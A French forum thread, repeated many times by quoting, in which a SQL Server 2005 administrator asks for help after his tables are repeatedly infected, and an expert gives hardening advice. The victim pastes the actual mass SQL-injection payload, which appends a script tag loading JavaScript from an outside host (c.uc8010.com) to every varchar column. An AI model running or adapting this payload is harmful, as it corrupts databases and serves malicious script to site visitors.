Depuis quelques jours, j'ai un probleme avec ma base de donn=E9es Sql
Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
n'arrete pas de corompre mes bases en mofidiant les champs de type
string de tous les tables en mettant un tag script pointant vers un
fichier javascript sur le serveur uc8010.com.
Je n'arrive pas =E0 detecter d'ou cela peut venir, virus, injection
Sql,.... Je ne vois aucune trace.
A l'aide, si quelqu'un connait la solution.
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Fred BROUARD
a écrit :
Bonjour,
Depuis quelques jours, j'ai un probleme avec ma base de données Sql Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne n'arrete pas de corompre mes bases en mofidiant les champs de type string de tous les tables en mettant un tag script pointant vers un fichier javascript sur le serveur uc8010.com.
Je n'arrive pas à detecter d'ou cela peut venir, virus, injection Sql,.... Je ne vois aucune trace. A l'aide, si quelqu'un connait la solution.
Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com Audit, conseil, expertise, formation, modélisation, tuning, optimisation *********************** http://www.sqlspot.com *************************
jpayenneville@gmail.com a écrit :
Bonjour,
Depuis quelques jours, j'ai un probleme avec ma base de données Sql
Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
n'arrete pas de corompre mes bases en mofidiant les champs de type
string de tous les tables en mettant un tag script pointant vers un
fichier javascript sur le serveur uc8010.com.
Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
Sql,.... Je ne vois aucune trace.
A l'aide, si quelqu'un connait la solution.
Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
*********************** http://www.sqlspot.com *************************
Depuis quelques jours, j'ai un probleme avec ma base de données Sql Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne n'arrete pas de corompre mes bases en mofidiant les champs de type string de tous les tables en mettant un tag script pointant vers un fichier javascript sur le serveur uc8010.com.
Je n'arrive pas à detecter d'ou cela peut venir, virus, injection Sql,.... Je ne vois aucune trace. A l'aide, si quelqu'un connait la solution.
Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com Audit, conseil, expertise, formation, modélisation, tuning, optimisation *********************** http://www.sqlspot.com *************************
jpayenneville
On 2 jan, 16:18, Fred BROUARD wrote:
a écrit :> Bonjour,
> Depuis quelques jours, j'ai un probleme avec ma base de données Sql > Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne > n'arrete pas de corompre mes bases en mofidiant les champs de type > string de tous les tables en mettant un tag script pointant vers un > fichier javascript sur le serveur uc8010.com.
> Je n'arrive pas à detecter d'ou cela peut venir, virus, injection > Sql,.... Je ne vois aucune trace. > A l'aide, si quelqu'un connait la solution.
> Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.c om Audit, conseil, expertise, formation, modélisation, tuning, optimisation ***********************http://www.sqlspot.com*************************
Déjà fait !!! Malheuresement je n'ai rien vu. En plus, les applications de notre systeme d'information utilisent la même authentification, à savoir un user spécifique. Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la machine.
Apparement l'injection realise cette procedure :
declare @m varchar(8000); set @m=''; select @m=@m+'update['+a.name+']set['+b.name +']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar' set @m=REVERSE(@m) set @m=substring(@m,PATINDEX('%;%',@m),8000); set @m=REVERSE(@m); exec(@m);
Comment eviter que ça se reproduise ? merci
On 2 jan, 16:18, Fred BROUARD <broua...@club-internet.fr> wrote:
jpayennevi...@gmail.com a écrit :> Bonjour,
> Depuis quelques jours, j'ai un probleme avec ma base de données Sql
> Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
> n'arrete pas de corompre mes bases en mofidiant les champs de type
> string de tous les tables en mettant un tag script pointant vers un
> fichier javascript sur le serveur uc8010.com.
> Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
> Sql,.... Je ne vois aucune trace.
> A l'aide, si quelqu'un connait la solution.
> Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.c om
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
***********************http://www.sqlspot.com*************************
Déjà fait !!!
Malheuresement je n'ai rien vu.
En plus, les applications de notre systeme d'information utilisent la
même authentification, à savoir un user spécifique.
Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la
machine.
Apparement l'injection realise cette procedure :
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name
+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);
> Depuis quelques jours, j'ai un probleme avec ma base de données Sql > Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne > n'arrete pas de corompre mes bases en mofidiant les champs de type > string de tous les tables en mettant un tag script pointant vers un > fichier javascript sur le serveur uc8010.com.
> Je n'arrive pas à detecter d'ou cela peut venir, virus, injection > Sql,.... Je ne vois aucune trace. > A l'aide, si quelqu'un connait la solution.
> Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.c om Audit, conseil, expertise, formation, modélisation, tuning, optimisation ***********************http://www.sqlspot.com*************************
Déjà fait !!! Malheuresement je n'ai rien vu. En plus, les applications de notre systeme d'information utilisent la même authentification, à savoir un user spécifique. Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la machine.
Apparement l'injection realise cette procedure :
declare @m varchar(8000); set @m=''; select @m=@m+'update['+a.name+']set['+b.name +']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar' set @m=REVERSE(@m) set @m=substring(@m,PATINDEX('%;%',@m),8000); set @m=REVERSE(@m); exec(@m);
Comment eviter que ça se reproduise ? merci
Fred BROUARD
Il suffit d'avoir une sécurité correcte de votre serveur et à mon avis le votre est une vraie passoire : 1) baissez les privilèges de sa/dbo au minimum 2) changeez les mots de passe de tous les utilisateurs 3) n'utilisez JAMAIS sa comme compte de connexion pour vos applications 4) utilisez des mots de passe pour tous les utilisateurs SQL 5) lancez : EXEC sp_configure 'allow updates ', 0 Désormais votre intru ne pourra plus aller modifier les tables systèmes !
Car c'est ce que fait votre script, et cela n'est possible que si votre trubion à des privilèges "sysadmin" ce qui laisse à pense que votre sécurité est une passoire et de sus cela n'est possible que si les tables systèmes peuvent être mise à jour, or ceci n'est possible que si le paramètre de serveur "allow updates" est à 1
A +
a écrit :
On 2 jan, 16:18, Fred BROUARD wrote:
a écrit :> Bonjour,
Depuis quelques jours, j'ai un probleme avec ma base de données Sql Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne n'arrete pas de corompre mes bases en mofidiant les champs de type string de tous les tables en mettant un tag script pointant vers un fichier javascript sur le serveur uc8010.com. Je n'arrive pas à detecter d'ou cela peut venir, virus, injection Sql,.... Je ne vois aucune trace. A l'aide, si quelqu'un connait la solution. Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com Audit, conseil, expertise, formation, modélisation, tuning, optimisation ***********************http://www.sqlspot.com*************************
Déjà fait !!! Malheuresement je n'ai rien vu. En plus, les applications de notre systeme d'information utilisent la même authentification, à savoir un user spécifique. Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la machine.
Apparement l'injection realise cette procedure :
declare @m varchar(8000); set @m=''; select @m=@m+'update['+a.name+']set['+b.name +']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar' set @m=REVERSE(@m) set @m=substring(@m,PATINDEX('%;%',@m),8000); set @m=REVERSE(@m); exec(@m);
Comment eviter que ça se reproduise ? merci
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com Audit, conseil, expertise, formation, modélisation, tuning, optimisation *********************** http://www.sqlspot.com *************************
Il suffit d'avoir une sécurité correcte de votre serveur et à mon avis
le votre est une vraie passoire :
1) baissez les privilèges de sa/dbo au minimum
2) changeez les mots de passe de tous les utilisateurs
3) n'utilisez JAMAIS sa comme compte de connexion pour vos applications
4) utilisez des mots de passe pour tous les utilisateurs SQL
5) lancez : EXEC sp_configure 'allow updates ', 0
Désormais votre intru ne pourra plus aller modifier les tables systèmes !
Car c'est ce que fait votre script, et cela n'est possible que si votre
trubion à des privilèges "sysadmin" ce qui laisse à pense que votre
sécurité est une passoire et de sus cela n'est possible que si les
tables systèmes peuvent être mise à jour, or ceci n'est possible que si
le paramètre de serveur "allow updates" est à 1
A +
jpayenneville@gmail.com a écrit :
On 2 jan, 16:18, Fred BROUARD <broua...@club-internet.fr> wrote:
jpayennevi...@gmail.com a écrit :> Bonjour,
Depuis quelques jours, j'ai un probleme avec ma base de données Sql
Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
n'arrete pas de corompre mes bases en mofidiant les champs de type
string de tous les tables en mettant un tag script pointant vers un
fichier javascript sur le serveur uc8010.com.
Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
Sql,.... Je ne vois aucune trace.
A l'aide, si quelqu'un connait la solution.
Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
***********************http://www.sqlspot.com*************************
Déjà fait !!!
Malheuresement je n'ai rien vu.
En plus, les applications de notre systeme d'information utilisent la
même authentification, à savoir un user spécifique.
Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la
machine.
Apparement l'injection realise cette procedure :
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name
+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);
Comment eviter que ça se reproduise ?
merci
--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
*********************** http://www.sqlspot.com *************************
Il suffit d'avoir une sécurité correcte de votre serveur et à mon avis le votre est une vraie passoire : 1) baissez les privilèges de sa/dbo au minimum 2) changeez les mots de passe de tous les utilisateurs 3) n'utilisez JAMAIS sa comme compte de connexion pour vos applications 4) utilisez des mots de passe pour tous les utilisateurs SQL 5) lancez : EXEC sp_configure 'allow updates ', 0 Désormais votre intru ne pourra plus aller modifier les tables systèmes !
Car c'est ce que fait votre script, et cela n'est possible que si votre trubion à des privilèges "sysadmin" ce qui laisse à pense que votre sécurité est une passoire et de sus cela n'est possible que si les tables systèmes peuvent être mise à jour, or ceci n'est possible que si le paramètre de serveur "allow updates" est à 1
A +
a écrit :
On 2 jan, 16:18, Fred BROUARD wrote:
a écrit :> Bonjour,
Depuis quelques jours, j'ai un probleme avec ma base de données Sql Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne n'arrete pas de corompre mes bases en mofidiant les champs de type string de tous les tables en mettant un tag script pointant vers un fichier javascript sur le serveur uc8010.com. Je n'arrive pas à detecter d'ou cela peut venir, virus, injection Sql,.... Je ne vois aucune trace. A l'aide, si quelqu'un connait la solution. Merci
Utilisez un profiler SQL pour voir ce qui se passe.
A +
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com Audit, conseil, expertise, formation, modélisation, tuning, optimisation ***********************http://www.sqlspot.com*************************
Déjà fait !!! Malheuresement je n'ai rien vu. En plus, les applications de notre systeme d'information utilisent la même authentification, à savoir un user spécifique. Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la machine.
Apparement l'injection realise cette procedure :
declare @m varchar(8000); set @m=''; select @m=@m+'update['+a.name+']set['+b.name +']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar' set @m=REVERSE(@m) set @m=substring(@m,PATINDEX('%;%',@m),8000); set @m=REVERSE(@m); exec(@m);
Comment eviter que ça se reproduise ? merci
-- Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com Audit, conseil, expertise, formation, modélisation, tuning, optimisation *********************** http://www.sqlspot.com *************************
